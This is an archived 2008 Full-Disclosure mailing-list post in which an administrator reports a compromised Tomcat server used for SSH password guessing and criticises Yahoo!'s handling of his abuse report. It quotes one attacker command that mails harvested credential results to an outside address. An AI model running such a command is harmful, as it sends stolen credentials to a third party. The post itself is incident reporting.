lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <47A992D7.1070503@syn-ack.org>
Date: Wed, 06 Feb 2008 11:58:31 +0100
From: Vincent van Scherpenseel <mailinglists@...-ack.org>
To: full-disclosure@...ts.grok.org.uk
Subject: What makes Yahoo! a good merger candidate?

Their abuse policy of course!

Last week a client's server was being attacked (some old Tomcat5 vuln) 
and used to attack other servers (ssh login guessing). The results of 
these dictionary attack were being mailed to the address 
'blax2004us@...oo.com':
cat vuln.txt |mail -s "Lame Gang Us Roots" blax2004us@...oo.com

After I addressed the vulnerability I decided to contact yahoo.com about 
this issue. Of course the only way to do this was by browsing the 
Yahoo.com site for any abuse/security contacts. After a while I found a 
form I could use to notify them of abuse of their services. So I wrote 
them a quick explanation about what was going on including the e-mail 
address of the account used to harvest passwords.

After a couple of hours I received an e-mail from 'Marcus' a Yahoo! 
Customer Care representative (44592956) asking me to provide a the full 
subject and other headers from the spam I had received.

After writing back kindly that I had no spam complaint but wanted to 
report the mal-use of an account of theirs I received another reply a 
little while later asking me to provide my *personal* information about 
my account and what errors I got when I tried to login. Well, I don't 
even *have* an Yahoo! account.

So, what do you do when you want to report something like this? In fact 
I'm doing them a favor by reporting but all I got is this lousy 
response. I'll have to think twice about reporting something like this 
next time...

Does anyone know an Yahoo! security contact that actually does his job?

Kind Regards,
Vincent van Scherpenseel

-- 
ServerFloor.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ